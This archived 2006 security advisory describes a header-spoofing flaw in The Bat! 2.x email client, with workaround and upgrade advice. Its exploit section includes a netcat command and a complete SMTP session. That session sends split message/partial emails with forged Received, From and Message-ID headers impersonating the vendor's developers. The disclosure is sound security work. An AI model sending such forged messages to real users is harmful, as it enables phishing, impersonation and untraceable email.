exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

thebatSpoof.txt

thebatSpoof.txt
Posted Feb 8, 2006
Authored by 3APA3A | Site security.nnov.ru

The design flow in the way The Bat! 2.x displays messages allows attackers to spoof RFC 822 headers and more.

tags | exploit, spoof
SHA-256 | ad0f681bcad8c9274be2769c052fb5e6dbf1f003fec29f7f9f7f7d1023ba0bdc

thebatSpoof.txt

Change Mirror Download

Title: The Bat! 2.x message headers spoofing
Author: 3APA3A <3APA3A@security.nnov.ru>
Homepage: http://www.security.nnov.ru/
Advisory URL: http://www.security.nnov.ru/advisories/thebatspoof.asp
Vendor: RitLabs
Vendor's page http://thebat.net/
Application: The Bat 2.x (2.12.04 tested)
Not vulnerable: The Bat! 3.5
Remote: Yes, against client
Category: Information spoofing

Intro:

The Bat! is very convenient, powerful and secure (comparing with
others) MUA (Mail User Agent) with many professional features:
templates, macroses, Bayesian SPAM filter, etc. This is commercial
product from RitLabs.

Vulnerability:

Design flow in the way The Bat! shows message/partial messages allow
attacker to spoof RFC 822 headers or original message, including _all_
Received: and Message-ID:. It makes it possible to create untrackable
message and spoof message origin, including sender's network.

Details:

The Bat! silently re-assembles partial message and shows encapsulated
data. The headers shown are ones of encapsulated message. Real headers
are lost completely.

Exploit:

Replace @example.com with destination address
nc ip_of_smtp_relay 25 <thebatexploit.txt


-=-=-=-=- begin thebatexploit.txt -=-=-=-=-
HELO example.com
MAIL FROM: <phiby@example.com>
RCPT TO: <phiby@example.com>
DATA
Date: Mon, 31 Jan 2006 13:30:00 +0300
From: 3APA3A <phiby@example.com>
X-Mailer: The Bat! (v2.12.00)
Organization: http://www.security.nnov.ru/
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
Message-ID: <p#1split@ACB0994591752.20060130184706@thebat.net>
MIME-Version: 1.0
Content-Type: message/partial; id="split@ACB0994591752.20060130184706@thebat.net";
number=1; total=2

Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135])
by mail.example.com (Postfix) with ESMTP id 9F89619EBEB
for <phiby@example.com>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: The Bat! developers <bugs@thebat.net>
X-Mailer: The Bat! (v2.12.00)
Organization: RitLabs
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Dear Phiby,

Best wishes for you and http://phiby.com/
.
RSET
MAIL FROM: <phiby@example.com>
RCPT TO: <phiby@example.com>
DATA
Date: Mon, 30 Jan 2006 13:30:06 +0300
From: 3APA3A <phiby@example.com>
Organization: http://www.security.nnov.ru/
X-Mailer: The Bat! (v2.12.00)
Organization: Microsoft
X-Priority: 3 (Normal)
Message-ID: <994591752.20060130184706@thebat.net>
To: Phiby <phiby@example.com>
Subject: Subject: Re[7]: //
Message-ID: <p#2split@ACB0994591752.20060130184706@microsof.com>
MIME-Version: 1.0
Content-Type: message/partial; id="split@ACB0994591752.20060130184706@thebat.net";
number=2; total=2

Yours, The Bat! develpment team.
.
QUIT
-=-=-=-=- end thebatexploit.txt -=-=-=-=-

Workaround:

Do not trust data The Bat! shows in headers.

Solution:

Upgrade to The Bat! 3.x (not free)








--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close